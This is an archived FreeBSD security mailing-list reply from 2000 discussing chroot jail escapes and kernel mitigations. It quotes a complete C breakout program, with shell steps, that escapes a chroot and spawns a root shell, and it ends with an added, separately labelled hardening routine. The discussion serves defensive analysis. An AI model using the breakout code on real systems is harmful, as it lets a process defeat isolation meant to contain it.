Date:      Tue, 23 May 2000 04:39:35 -0700
From:      Don Lewis <Don.Lewis@tsc.tdk.com>
To:        Poul-Henning Kamp <phk@critter.freebsd.dk>, Harold Gutch <logix@foobar.franken.de>
Cc:        Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>, Paul Hart <hart@iserver.com>, Adam Laurie <adam@algroup.co.uk>, freebsd-security@FreeBSD.ORG
Subject:   Re: envy.vuurwerk.nl daily run output
Message-ID:  <200005231139.EAA13204@salsa.gv.tsc.tdk.com>
In-Reply-To: <2780.958684841@critter.freebsd.dk>
References:   <2780.958684841@critter.freebsd.dk>

On May 18, 11:20pm, Poul-Henning Kamp wrote:
} Subject: Re: envy.vuurwerk.nl daily run output
} 
} Please check the action of the "kern.chroot_allow_open_directories"
} for a deeper explanation of this one.  It is not set to zero for
} fear of compatibility issues.  Maybe we should set it to zero in
} -current to see if there are any such issues.

That only protects against carelessly written chroot wrappers that
leave file descriptors open that point to directories outside the
jail.  Given that, even a non-root process can escape.

Even with kern.chroot_allow_open_directories disabled, I know of
two ways that a process can escape if it can fork() and can
execute chroot() again (the latter requires the process to
be root), unless further modifications have been made to the
chroot syscall.  These changes have been in FreeBSD 4.x and later
since last September.

} In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes:

} >What about the "other" chroot-breakout, does it still work under
} >FreeBSD 4.0?

Try statically linking the executable and doing:
	mkdir jail jail/tmp
	cp a.out jail
	chroot jail a.out

This code should be able to escape the jail in 3.x.  In 4.x it will be
able to escape jail/tmp (if kern.chroot_allow_open_directories is enabled)
but it won't be able to escape jail.


} >Here's the breakout-code modulo checks whether /tmp exists etc.
} >
} >#include <fcntl.h>
} >#include <stdlib.h>
} >#include <unistd.h>
} > 
} >int main(int argc, char *argv[])
} >{
} >	int handle, i;
} > 
} >	handle = open("/", O_RDONLY);
} >	chroot("/tmp");
} >	chdir("/");
} >	fchdir(handle);
} >	for (i = 0; i < 32; i++)
} >		chdir("..");
} >	chroot(".");
} >	chdir("/");
} >	system("/bin/sh");
} >
} >	return 0;
} >}
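
The careful wrapper sequence the reply above implies, as an added example in C that is not code from the original thread: audit for open directory descriptors before chroot(), chdir() into the jail first so "." is inside it, then drop root so chroot() cannot be executed a second time. The jail path, uid and gid are caller-supplied assumptions; enter_jail() only succeeds when run as root.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <sys/stat.h>
#include <unistd.h>

/* Count open file descriptors that refer to directories, the kind of
   descriptor the quoted breakout keeps across chroot().  A careful
   wrapper expects zero here before it calls chroot(). */
int count_open_dir_fds(void)
{
    int count = 0;
    long maxfd = sysconf(_SC_OPEN_MAX);
    if (maxfd < 0)
        maxfd = 1024;   /* assumed fallback when the limit is unknown */
    for (int fd = 0; fd < maxfd; fd++) {
        struct stat st;
        if (fstat(fd, &st) == 0 && S_ISDIR(st.st_mode))
            count++;
    }
    return count;
}

/* Enter a jail: refuse if any directory fd is open (errno EBADF),
   chdir() before chroot() so the working directory is inside the jail,
   then drop supplementary groups, gid and uid so a second chroot() is
   impossible.  Returns 0 on success, -1 with errno set otherwise. */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    if (count_open_dir_fds() > 0) {
        errno = EBADF;
        return -1;
    }
    if (chdir(jail) != 0 || chroot(".") != 0 || chdir("/") != 0)
        return -1;
    /* Order matters: groups and gid first, uid last; after setuid()
       the process can no longer regain root. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Confirm the drop took effect: regaining uid 0 must now fail. */
    if (setuid(0) == 0 || getuid() != uid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}
```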

